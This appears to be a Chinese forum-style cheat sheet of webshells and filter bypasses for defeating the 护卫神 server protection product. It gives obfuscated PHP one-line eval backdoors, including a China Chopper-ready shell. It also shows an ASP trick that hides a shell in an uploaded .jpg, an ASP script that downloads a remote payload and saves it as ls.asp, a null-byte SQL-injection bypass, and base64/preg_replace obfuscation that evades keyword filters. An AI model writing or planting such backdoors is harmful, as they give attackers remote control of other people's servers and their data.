一、马儿篇,都是以前可以过护卫神的马
二、注入篇,可以绕过注入的方法
三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿
一、马儿篇
—————-1号————————–
- <!--?php <br ?--> @eval
- ($_POST['1']);?>
—————-2号————————–
- nono<!--?php <br ?--> eval
- ($_POST
- [1])
- ?>
——————–3号————————
- <!--?php $a = str_replace(x,””,”axsxxsxexrxxt”);<br ?--> $a($_POST["c"]); ?>
- 菜刀直接连,不需要构造连接字符串,密码 c
——————–类似于过安全狗的包含方法——————————————-
- A.asp版本:
- 将一句话保存为 XX.jpg 上传后 地址为 …/xxxxxx.jpg
- 在上传一个 x.asp 内容为 <!–#include file=”../xxxxxx.jpg”–>
- B.php版本
- 如果是php的话:
- <!--?php <br ?--> include “1.htm”;
- ?>
——————实在不行,还可以下载——————————————————
远程下载马
- <%
- Set xPost = CreateObject(“Microsoft.XMLHTTP”)
- xPost.Open “GET”,”http://www.xxx.com/123/1.txt”,False
- xPost.Send()
- Set sGet = CreateObject(“ADODB.Stream”)
- sGet.Mode = 3
- sGet.Type = 1
- sGet.Open()
- sGet.Write(xPost.responseBody)
- sGet.SaveToFile Server.MapPath(“ls.asp”),2
- set sGet = nothing
- set sPOST = nothing
- %>
—————————————————————
二、注入篇
- /*%00*/截断符
- select/*%00*/* from admin;
—————————————————————
三、规则篇
可以利用类似:
- <!--?php <br ?--> $code=’一串base64′; //base64编码
- $x=str_replace(‘f’,””,”bfafsfef6f4f_ffdffeffcffoffdffef”); //字符串替换
- $a = ‘/a/’;//正则规则
- preg_replace($a,’e’.’v’.’a’.’l’.’(‘.$x.’(‘.$code.’))’,’a’); //正则替换
- ?>
方法绕过关键词过滤
这个我喜欢